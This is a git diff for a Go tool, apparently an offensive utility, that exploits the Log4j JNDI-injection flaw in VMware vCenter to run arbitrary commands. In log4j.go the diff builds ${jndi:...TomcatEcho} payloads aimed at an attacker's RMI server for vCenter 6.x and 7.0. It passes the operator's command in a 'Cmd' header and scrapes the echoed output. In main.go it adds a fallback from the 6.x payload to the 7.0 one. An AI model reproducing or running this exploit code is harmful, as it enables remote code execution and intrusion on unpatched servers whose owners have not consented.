diff --git a/README.md b/README.md index 493acbe..a776fd6 100644 --- a/README.md +++ b/README.md @@ -71,6 +71,7 @@ V1.2 增加了针对Vcenter的log4j检测和验证能力 V1.3 增加了对Vmware WorkSpace One Access的漏洞验证功能,包括CVE-2022-22954 远程命令执行;CVE-2022-22972、CVE-2022-31656身份鉴别绕过 V1.3.1 修复了检测log4j时忽略了端口的问题,有的服务会更改默认的443端口 V1.3.2 修改了针对log4j的利用方式,通过tomcatbypassEcho的方式执行命令并获取回显。vcenter 7.0 linux测试通过。 +V1.3.3 增加了对6.7和7.0版本的区别利用,7.0必须使用tomcatbypass,而6.7使用普通的basic就行了 ... ``` diff --git a/go.mod b/go.mod index 27d6150..8599d87 100644 --- a/go.mod +++ b/go.mod @@ -3,6 +3,7 @@ module GO_VCENTER go 1.18 require ( + github.com/beevik/etree v1.1.0 // indirect github.com/buger/jsonparser v1.1.1 // indirect github.com/cheekybits/genny v1.0.0 // indirect github.com/fatih/color v1.13.0 // indirect diff --git a/go.sum b/go.sum index ff0ee49..d83b970 100644 --- a/go.sum +++ b/go.sum @@ -9,6 +9,8 @@ dmitri.shuralyov.com/state v0.0.0-20180228185332-28bcc343414c/go.mod h1:0PRwlb0D git.apache.org/thrift.git v0.0.0-20180902110319-2566ecd5d999/go.mod h1:fPE2ZNJGynbRyZ4dJvy6G277gSllfV2HJqblrnkyeyg= github.com/BurntSushi/toml v0.3.1/go.mod h1:xHWCNGjB5oqiDr8zfno3MHue2Ht5sIBksp03qcyfWMU= github.com/anmitsu/go-shlex v0.0.0-20161002113705-648efa622239/go.mod h1:2FmKhYUyUczH0OGQWaF5ceTx0UBShxjsH6f8oGKYe2c= +github.com/beevik/etree v1.1.0 h1:T0xke/WvNtMoCqgzPhkX2r4rjY3GDZFi+FjpRZY2Jbs= +github.com/beevik/etree v1.1.0/go.mod h1:r8Aw8JqVegEf0w2fDnATrX9VpkMcyFeM0FhwO62wh+A= github.com/beorn7/perks v0.0.0-20180321164747-3a771d992973/go.mod h1:Dwedo/Wpr24TaqPxmxbtue+5NUziq4I4S80YR8gNf3Q= github.com/bradfitz/go-smtpd v0.0.0-20170404230938-deb6d6237625/go.mod h1:HYsPBTaaSFSlLx/70C2HPIMNZpVV8+vt/A+FMnYP11g= github.com/buger/jsonparser v0.0.0-20181115193947-bf1c66bbce23/go.mod h1:bbYlZJ7hK1yFx9hf58LP0zeX7UjIGs20ufpu3evjr+s= diff --git a/main.go b/main.go index c0b1a76..d56c5ee 100644 --- a/main.go +++ b/main.go @@ -117,7 +117,14 @@ func main() { usage() os.Exit(0) } else { - log4jcenter.Exec_cmd(url, rmi, command) + if log4jcenter.Exec_cmd(url, rmi, command, "6") { + // + } else { + fmt.Println("[-] Vcenter 6.X paylaod 利用失败,尝试7.0") + if !log4jcenter.Exec_cmd(url, rmi, command, "7") { + fmt.Println("[-] 回显失败,目标不存在漏洞或其他原因.") + } + } } } else { diff --git a/src/log4jcenter/log4j.go b/src/log4jcenter/log4j.go index 5a73f8e..2b8a47a 100644 --- a/src/log4jcenter/log4j.go +++ b/src/log4jcenter/log4j.go @@ -127,14 +127,23 @@ func exploit(url, rmiserver string) { } -func Exec_cmd(url, rmiserver, command string) { +func Exec_cmd(url, rmiserver, command, version string) bool { host := rmiserver client := req.C() client.EnableForceHTTP1() client.EnableInsecureSkipVerify() client.SetTimeout(2 * time.Second) // client.SetProxyURL("http://127.0.0.1:8080") //尽量别用burp做代理,burp2022.8会启用http2,导致vcenter报错403 - rmi_server := fmt.Sprintf("${jndi:%s/TomcatBypass/TomcatEcho}", host) + rmi_server := "" + cmd := "" + if version == "6" { + rmi_server = fmt.Sprintf("${jndi:%s/Basic/TomcatEcho}", host) + cmd = command + " && echo nmsl" + } else { + rmi_server = fmt.Sprintf("${jndi:%s/TomcatBypass/TomcatEcho}", host) + cmd = command + ";echo 'nmsl'" + } + myheader := map[string]string{ "User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", @@ -145,7 +154,7 @@ func Exec_cmd(url, rmiserver, command string) { "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "none", "Sec-Fetch-User": "?1", - "Cmd": command + ";echo 'nmsl'", + "Cmd": cmd, } resp, err := client.R(). @@ -166,8 +175,10 @@ func Exec_cmd(url, rmiserver, command string) { result = strings.Split(result, "nmsl")[0] result = strings.TrimRight(result, "\n") fmt.Println(result) + return true } else { - fmt.Println("[-] 回显失败,目标不存在漏洞或其他原因.") + + return false } }